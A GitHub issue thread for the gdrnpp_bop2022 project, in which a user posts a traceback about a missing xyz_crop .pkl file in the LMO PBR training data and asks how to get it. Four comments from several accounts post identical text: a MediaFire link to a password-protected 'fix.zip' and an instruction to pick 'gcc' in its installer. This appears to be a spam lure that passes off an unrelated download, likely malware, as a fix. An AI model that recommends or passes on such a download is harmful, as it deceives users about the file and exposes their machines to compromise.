### ISSUE TITLE
AssertionError: /home/eric/gdrnpp1/datasets/BOP_DATASETS/lmo/train_pbr/xyz_crop/000000/000000_000006-xyz.pkl

### ISSUE THREAD

**Issue by 1230678** [shanice-l/gdrnpp_bop2022#123]
需要帮助，感谢，这个文件夹中没有pkl文件，不知道是不是需要从其他文件夹中复制过来或者如何生成？
20240826_194459|__main__@171: 102.639673M params
  0%|          | 0/50 [00:00<?, ?it/s]20240826_194459|core.gdrn_modeling.datasets.lm_pbr@98: loading dataset dicts: lmo_pbr_train
  0%|          | 0/300 [00:00<?, ?it/s, 0]
  0%|          | 0/50 [00:00<?, ?it/s], 0]
20240826_194459|ERR|__main__@233: An error has been caught in function '<module>', process 'MainProcess' (1943), thread 'MainThread' (140222592196736):
Traceback (most recent call last):

> File "./core/gdrn_modeling/main_gdrn.py", line 233, in <module>
    main(args)
    │    └ Namespace(config_file='configs/gdrn/lmo_pbr/convnext_a6_AugCosyAAEGray_BG05_mlL1_DMask_amodalClipBox_classAware_lmo.py', dist...
    └ <function main at 0x7f872556e4c0>

  File "./core/gdrn_modeling/main_gdrn.py", line 199, in main
    Lite(
    └ <class '__main__.Lite'>

  File "/home/eric/anaconda3/envs/ce/lib/python3.8/site-packages/pytorch_lightning/lite/lite.py", line 408, in _run_impl
    return run_method(*args, **kwargs)
           │           │       └ {}
           │           └ (Namespace(config_file='configs/gdrn/lmo_pbr/convnext_a6_AugCosyAAEGray_BG05_mlL1_DMask_amodalClipBox_classAware_lmo.py', dis...
           └ functools.partial(<bound method LightningLite._run_with_strategy_setup of <__main__.Lite object at 0x7f881db57e20>>, <bound m...
  File "/home/eric/anaconda3/envs/ce/lib/python3.8/site-packages/pytorch_lightning/lite/lite.py", line 413, in _run_with_strategy_setup
    return run_method(*args, **kwargs)
           │           │       └ {}
           │           └ (Namespace(config_file='configs/gdrn/lmo_pbr/convnext_a6_AugCosyAAEGray_BG05_mlL1_DMask_amodalClipBox_classAware_lmo.py', dis...
           └ <bound method Lite.run of <__main__.Lite object at 0x7f881db57e20>>

  File "./core/gdrn_modeling/main_gdrn.py", line 185, in run
    self.do_train(cfg, args, model, optimizer, renderer=renderer, resume=args.resume)
    │    │        │    │     │      │                   │                │    └ False
    │    │        │    │     │      │                   │                └ Namespace(config_file='configs/gdrn/lmo_pbr/convnext_a6_AugCosyAAEGray_BG05_mlL1_DMask_amodalClipBox_classAware_lmo.py', dist...
    │    │        │    │     │      │                   └ <lib.egl_renderer.egl_renderer_v3.EGLRenderer object at 0x7f87254e89d0>
    │    │        │    │     │      └ LiteRanger (
    │    │        │    │     │        Parameter Group 0
    │    │        │    │     │            N_sma_threshhold: 5
    │    │        │    │     │            alpha: 0.5
    │    │        │    │     │            betas: (0.95, 0.999)
    │    │        │    │     │            eps: 1e-05
    │    │        │    │     │            k: 6
    │    │        │    │     │            lr...
    │    │        │    │     └ _LiteModule(
    │    │        │    │         (_module): GDRN_DoubleMask(
    │    │        │    │           (backbone): FeatureListNet(
    │    │        │    │             (stem_0): Conv2d(3, 128, kernel_size=(4, 4),...
    │    │        │    └ Namespace(config_file='configs/gdrn/lmo_pbr/convnext_a6_AugCosyAAEGray_BG05_mlL1_DMask_amodalClipBox_classAware_lmo.py', dist...
    │    │        └ Config (path: configs/gdrn/lmo_pbr/convnext_a6_AugCosyAAEGray_BG05_mlL1_DMask_amodalClipBox_classAware_lmo.py): {'OUTPUT_ROOT...
    │    └ <function GDRN_Lite.do_train at 0x7f872595b8b0>
    └ <__main__.Lite object at 0x7f881db57e20>

  File "/home/eric/gdrnpp1/core/gdrn_modeling/../../core/gdrn_modeling/engine/engine.py", line 176, in do_train
    data_loader = build_gdrn_train_loader(cfg, train_dset_names)
                  │                       │    └ ('lmo_pbr_train',)
                  │                       └ Config (path: configs/gdrn/lmo_pbr/convnext_a6_AugCosyAAEGray_BG05_mlL1_DMask_amodalClipBox_classAware_lmo.py): {'OUTPUT_ROOT...
                  └ <function build_gdrn_train_loader at 0x7f87259933a0>

  File "/home/eric/gdrnpp1/core/gdrn_modeling/../../core/gdrn_modeling/datasets/data_loader.py", line 859, in build_gdrn_train_loader
    dataset_dicts = get_detection_dataset_dicts(
                    └ <function get_detection_dataset_dicts at 0x7f8774dc6ca0>

  File "/home/eric/anaconda3/envs/ce/lib/python3.8/site-packages/detectron2/data/build.py", line 253, in get_detection_dataset_dicts
    dataset_dicts = [DatasetCatalog.get(dataset_name) for dataset_name in names]
                     │              │                                     └ ('lmo_pbr_train',)
                     │              └ <function _DatasetCatalog.get at 0x7f8774da8d30>
                     └ DatasetCatalog(registered datasets: coco_2014_train, coco_2014_val, coco_2014_minival, coco_2014_valminusminival, coco_2017_t...
  File "/home/eric/anaconda3/envs/ce/lib/python3.8/site-packages/detectron2/data/build.py", line 253, in <listcomp>
    dataset_dicts = [DatasetCatalog.get(dataset_name) for dataset_name in names]
                     │              │   │                 └ 'lmo_pbr_train'
                     │              │   └ 'lmo_pbr_train'
                     │              └ <function _DatasetCatalog.get at 0x7f8774da8d30>
                     └ DatasetCatalog(registered datasets: coco_2014_train, coco_2014_val, coco_2014_minival, coco_2014_valminusminival, coco_2017_t...
  File "/home/eric/anaconda3/envs/ce/lib/python3.8/site-packages/detectron2/data/catalog.py", line 58, in get
    return f()
           └ <core.gdrn_modeling.datasets.lm_pbr.LM_PBR_Dataset object at 0x7f872556f6d0>

  File "/home/eric/gdrnpp1/core/gdrn_modeling/../../core/gdrn_modeling/datasets/lm_pbr.py", line 190, in __call__
    assert osp.exists(xyz_path), xyz_path
           │   │      │          └ '/home/eric/gdrnpp1/datasets/BOP_DATASETS/lmo/train_pbr/xyz_crop/000000/000000_000006-xyz.pkl'
           │   │      └ '/home/eric/gdrnpp1/datasets/BOP_DATASETS/lmo/train_pbr/xyz_crop/000000/000000_000006-xyz.pkl'
           │   └ <function exists at 0x7f881dbbbe50>
           └ <module 'posixpath' from '/home/eric/anaconda3/envs/ce/lib/python3.8/posixpath.py'>

AssertionError: /home/eric/gdrnpp1/datasets/BOP_DATASETS/lmo/train_pbr/xyz_crop/000000/000000_000006-xyz.pkl

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 1230678** [comment]
几位前辈提供的好像是windows下修复压缩包的软件，我在ubuntu下，train_pbr文件下应该有pkl文件吗

**Comment by 1230678** [comment]
@wangg12 王博士，需要您的帮助
